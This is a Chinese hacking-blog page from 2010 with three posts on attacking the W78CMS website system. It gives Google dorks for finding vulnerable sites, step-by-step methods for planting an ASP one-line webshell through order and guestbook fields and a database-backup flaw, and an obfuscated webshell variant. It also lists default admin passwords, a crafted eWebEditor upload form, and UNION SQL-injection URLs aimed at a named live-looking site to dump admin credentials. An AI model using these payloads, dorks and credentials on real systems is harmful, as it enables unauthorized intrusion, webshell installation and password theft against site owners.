浏览模式: 标准 | 列表Tag:w78cms

W78CMS 漏洞拿shell

Submitted by admin
2010, September 11, 2:18 PM

备份文件生成在程序所在目录

关键词为:inurl:ShopMore.asp?id

利用方法有二
大前提条件:网站目录可写,且未删除文件备份功能
方法一:
前提条件:对方未修改数据库的默认地址
第一步:订购页面,直接在 产品名称,订购数量等输入一句话木马
<%eval request("ha")%>
第二步:备份数据库。数据库名为asp文件(这里注意:第一次备份的时候,程序会自动添加.MDB后缀,需要备份两次)注:会弹出要你登陆的框,不要管,再执行一下备份
第三步:一句话木马连接,上传shell

方法二:
前提条件:对方未修改EWEB的默认路径
第一步:直接在EWEB里上传一个图片后缀的木马。
第二步:备份数据库。数据库名为asp文件(这里注意:第一次备份的时候,程序会自动添加.MDB后缀,需要备份两次)注:会弹出要你登陆的框,不要管,再执行一下备份
第三步:备份后的就是你的shell了


原理
备份数据库程序文件验证过滤失误,导致程序在验证前先执行了备份数据库。
而订购信息是直接写入数据库的。

 

系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin   password:198625
不能进的还可以试试

后台默认密码为86779533 abc123这两个

试试数据库默认地址为/data/#sze7xiaohu.mdb

 

%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'=' 直接丢搜索栏也行

 =======================

把.mdb解析成.asp后,就相当于把mdb的数据库改成asa或者asp。这里只要在数据库中写入一句话木马,便可以顺利的得到一个
webshell。对这个一句话怎么写呢?已经有很多先例了,想想新云那个。嘎嘎!

拿出unicode变形一句话,┼癥污爠煥敵瑳∨≡┩>密码a。注意变形一句话的时候,只要不出现?号就可以成功被执行!


从数据库中简单分析下,除了图片就是文章内容。要找个地方写入数据库,最好的地方就是留言簿了。

留言标题 留言性质 留言姓名 联系电话 联系邮箱 随意填写,留言内容:┼癥污爠煥敵瑳∨≡┩>


好了,一句连接下。


成功取得webshell,


文章转载自网管网:http://www.bitscn.com/network/hack/201008/189732.html

===========

 

补充:ewebeditor 5.5 可以利用oday

 

<form action="http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

Tags: w78cms

黑友网文 | 评论:0 | Trackbacks:0 | 阅读:14741

W78CMS企业网站管理系统 v2.6.1 注射

Submitted by admin
2010, April 14, 8:57 AM

Author:Lan3a
关键字:inurl:ShowDownload.asp?id=
在admin目录下,add_js.asp文件中。
未做任何处理就直接查询数据库。
 

<!--#include file="../conn.asp"-->
<%
set js = server.CreateObject("ADODB.RecordSet")
sql="select * from ad where id="& request.QueryString("id")
set js = conn.Execute (Sql)
......
%>

用NBSI或Pangolin等工具可以注射成功。
还有Session欺骗等
注入地址:http://localhost/admin/add_js.asp?id=1

 

Tags: w78cms

漏洞分析 | 评论:0 | Trackbacks:0 | 阅读:9440

W78CMS SQL注入漏洞

Submitted by admin
2010, April 3, 7:14 PM

W78企业ASP网站管理系统V1.1的SQL注入
程序发布日期:2010年03月18日.
裸奔的系统。
1.shopmore.asp

set rs=server.createobject("adodb.recordset")
exec="select * from [shop] where ssfl="& request.QueryString("id") &" order by id desc  "
rs.open exec,conn,1,1
if rs.eof then
response.Write " 该分类暂无产品!"
else
rs.PageSize =20 '每页记录条数
iCount=rs.RecordCount '记录总数
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request("page")
if Not IsNumeric(page) or page="" then
page=1
2.about.asp

exec="select * from [about] where id="& request.QueryString("id")
set rs=server.createobject("adodb.recordset")
rs.open exec,conn,1,1

3.search_news.asp

dim title
title=request.form("form_news")
set rs=conn.execute("select * from [news] where title like '%"&title&"%'")
if title="" then
response.write ("<script language=""javascript"">alert(""请输入关键字!"");history.go(-1);</script>")
end if
if rs.eof then
response.write ("<script language=""javascript"">alert(""没有搜索到相关内容!"");history.go(-1);</script>")

还有其他的页面。

4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试

后台默认密码为86779533 abc123这两个

试试数据库默认地址为/data/%23sze7xiaohu.mdb

exp:http://www.voicetune.com/about.asp?id=2%20and%201=2%20union%20select%201,admin,3,password,5,6%20from%20admin

http://www.voicetune.com/ShopMore.asp?id=13%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin

搜索型注入:%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='

Google:inurl:ShopMore.asp?id

Tags: w78cms

漏洞分析 | 评论:0 | Trackbacks:0 | 阅读:11757